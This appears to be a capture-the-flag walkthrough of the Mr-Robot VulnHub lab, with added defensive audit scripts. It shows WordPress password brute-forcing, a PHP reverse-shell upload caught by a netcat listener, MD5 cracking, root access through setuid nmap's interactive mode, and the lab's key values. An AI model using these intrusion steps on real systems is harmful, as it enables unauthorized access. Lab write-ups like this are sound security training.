Today I’m publishing my walkthrough of the VM hosted on VulnHub called Mr-Robot: 1 by Jason.
First of all, the VM’s description on the web page says that it is based on the TV series Mr. Robot and that there are three hidden keys to find.
So I started by finding the VM’s IP address with the netdiscover command:
Then I launched nmap:
The scan result reveals that ports 80 and 443 are open and port 22 is closed. Opening the web server I could see a beautiful website, and if we type the commands listed on the fake terminal it shows more videos:
I opened the source code and saw some JS scripts; one of them looked like it only writes to the window’s log. Nothing interesting:
Then we can see whether nikto reveals something:
Good! Nikto said that Apache mod_negotiation is enabled with MultiViews. This means that if the server receives a request for a file that does not exist in a directory, it reads that directory looking for files named name.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings they would have if the client had asked for one of them by name. It then chooses the best match to the client’s requirements. Nikto also said that the website is WordPress, so we can launch wpscan for further information. Before starting wpscan I visited robots.txt on the web server, where I found two interesting files:
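The MultiViews finding above is normally fixed with Options -MultiViews in the relevant Directory block. As an added example, not code from the original post, the following Python script audits an Apache config for directories that still leave MultiViews on; the config text it parses is constructed for illustration.

```python
"""Audit an Apache config for directories that leave MultiViews (mod_negotiation) on.

Added example, not part of the original walkthrough; the config text below is
constructed for illustration. Options inheritance between nested <Directory>
blocks is not modelled."""
import re

SAMPLE_CONF = """\
<Directory /var/www/html>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride None
</Directory>
<Directory /var/www/html/wp-content/uploads>
    Options -Indexes -MultiViews
</Directory>
<Directory "/var/www/html/static">
    Options All
</Directory>
"""

DIR_BLOCK = re.compile(r"<Directory\s+([^>]+)>(.*?)</Directory>", re.S | re.I)
OPTIONS = re.compile(r"^\s*Options\s+(.+?)\s*$", re.M | re.I)

def multiviews_enabled(block: str) -> bool:
    """True if the Options lines in this block leave MultiViews on.
    'Options All' means every option except MultiViews, so it does not count."""
    enabled = False
    for m in OPTIONS.finditer(block):
        tokens = m.group(1).split()
        if all(t[0] in "+-" for t in tokens):
            # Relative form adjusts the inherited set one option at a time.
            for t in tokens:
                if t[1:].lower() == "multiviews":
                    enabled = t[0] == "+"
        else:
            # Absolute form replaces the whole option set.
            enabled = any(t.lower() == "multiviews" for t in tokens)
    return enabled

def audit(conf: str) -> dict:
    """Map each <Directory> path to whether MultiViews is enabled there."""
    return {path.strip().strip('"'): multiviews_enabled(body)
            for path, body in DIR_BLOCK.findall(conf)}

if __name__ == "__main__":
    for path, on in audit(SAMPLE_CONF).items():
        print(f"{path}: MultiViews {'ENABLED' if on else 'off'}")
```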
The file key-1-of-3.txt is the first key; the other file, fsocity.dic, is supposedly a wordlist. So I launched wpscan:
Perfect! The first scan result reveals a vulnerability and a WordPress installation! I tried to log in with some usernames and, obviously, I found one user named elliot! So I launched wpscan to crack elliot’s password with the previous wordlist fsocity.dic, slightly modified. This was possible because the wordlist contained many repeated passwords.
After less than two minutes I found elliot’s password!! Now we can log in with these credentials and then upload the /usr/share/webshells/php-reverse-shell.php file, having already changed the reverse IP address:
I launched the netcat listener and, after spawning a proper bash shell through python, I listed the home folder and found the second key file and an MD5 password file. Unfortunately the second key was readable only by root.
root@kali:~/Scrivania/reports/mrrobot# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.159] from (UNKNOWN) [192.168.1.10] 59837
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 02:51:42 up  4:05,  0 users,  load average: 0.00, 0.05, 0.37
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
$
$ python -c "import pty; pty.spawn('/bin/bash');"
daemon@linux:/$ ls -l home
ls -l home
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot
daemon@linux:/$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
I opened this website and looked up the MD5 hash:
After this step, I logged in as robot and could finally see the second key!!
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$
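The password.raw-md5 entry could be resolved by a web lookup because it is an unsalted MD5 of a well-known string (the alphabet is even an RFC 1321 test vector). As an added example, not from the original post, this Python script audits such a user:hash file against a constructed candidate list and shows the salted, slow-hash storage that would have resisted the lookup; the candidate list and the storage format are assumptions of the example.

```python
"""Audit a 'user:hash' file like password.raw-md5 for unsalted MD5 of weak values,
and show how a salted, slow hash would store the same password instead.
Added example, not from the original walkthrough. The file line is the one the
walkthrough found; the candidate list is constructed for illustration."""
import hashlib
import hmac
import os

PASSWORD_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed candidates. The alphabet string is also the RFC 1321 MD5 test
# vector, which is why online lookup tables resolve this digest instantly.
CANDIDATES = ["password", "123456", "abcdefghijklmnopqrstuvwxyz", "letmein"]

def parse_user_hashes(text: str) -> dict:
    """Map each user to its lowercase hex digest; skip malformed lines."""
    out = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.split(":", 1)
            out[user.strip()] = digest.strip().lower()
    return out

def find_unsalted_md5(digest: str, candidates):
    """Return the candidate whose bare MD5 equals digest, else None."""
    for cand in candidates:
        if hashlib.md5(cand.encode()).hexdigest() == digest:
            return cand
    return None

def audit(text: str, candidates=CANDIDATES) -> dict:
    """user -> recovered plaintext (or None) for each entry in the file."""
    return {u: find_unsalted_md5(h, candidates) for u, h in parse_user_hashes(text).items()}

def store_password(password: str, iterations: int = 600_000) -> str:
    """Mitigation: random per-user salt plus a slow KDF (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute the KDF from the stored salt and compare in constant time."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for user, found in audit(PASSWORD_FILE).items():
        print(user, "->", found or "not in candidate list")
    rec = store_password("abcdefghijklmnopqrstuvwxyz")
    print(verify_password("abcdefghijklmnopqrstuvwxyz", rec), verify_password("wrong", rec))
```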
At this point I wanted to look for setuid files that might be exploitable.
robot@linux:~$ find / -perm +6000 2> /dev/null
find / -perm +6000 2> /dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
An old nmap version is installed. We can now use the interactive mode inside nmap and check who we are. Yes, we are root!!
daemon@linux:/$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !ls -l /root
!ls -l /root
total 4
-rw-r--r-- 1 root root  0 Nov 13  2015 firstboot_done
-r-------- 1 root root 33 Nov 13  2015 key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
I browsed into the root folder and found the third key!!
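The find listing above also catches setgid directories (the /usr/local/share entries), and the item that matters is the setuid nmap outside the usual set of system binaries. As an added example, not code from the original post, the following Python script classifies such a listing against an illustrative baseline and flags what needs review; it assumes the listing was produced with GNU find's -printf '%M %u %p\n' format, and both the sample lines and the baseline are constructed.

```python
r"""Classify a setuid/setgid listing and flag files outside a known baseline.

Added example, not from the original walkthrough. It assumes the listing came
from GNU find's -printf, e.g.  find / -perm /6000 -printf '%M %u %p\n'
('/6000' is the current spelling of the deprecated '+6000'). The sample lines
are constructed to mirror the walkthrough's output."""

SAMPLE_LISTING = """\
-rwsr-xr-x root /bin/ping
-rwsr-xr-x root /bin/su
-rwsr-xr-x root /usr/bin/passwd
-rwsr-xr-x root /usr/bin/sudo
-rwxr-sr-x root /usr/bin/screen
-rwsr-xr-x root /usr/local/bin/nmap
drwxrwsr-x root /usr/local/share/xml
drwxrwsr-x root /usr/local/share/ca-certificates
"""

# Illustrative baseline of binaries that are setuid/setgid on a stock install;
# a real audit would take this from a trusted package manifest.
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/screen",
}

def classify(listing: str):
    """Yield (path, owner, category) per line. Directories show up because a
    setgid bit on a shared directory also matches -perm /6000; they are benign."""
    for line in listing.splitlines():
        mode, owner, path = line.split(None, 2)
        setuid = mode[3] in "sS"   # owner-execute slot carries the setuid bit
        setgid = mode[6] in "sS"   # group-execute slot carries the setgid bit
        if mode[0] == "d":
            yield path, owner, "setgid-dir"
        elif path in BASELINE:
            yield path, owner, "baseline"
        elif setuid:
            yield path, owner, "unexpected-setuid"
        elif setgid:
            yield path, owner, "unexpected-setgid"

def findings(listing: str) -> list:
    """Paths that deserve review: setuid/setgid files outside the baseline."""
    return [p for p, _, cat in classify(listing) if cat.startswith("unexpected")]

if __name__ == "__main__":
    for path, owner, cat in classify(SAMPLE_LISTING):
        print(f"{cat:18} {owner:6} {path}")
```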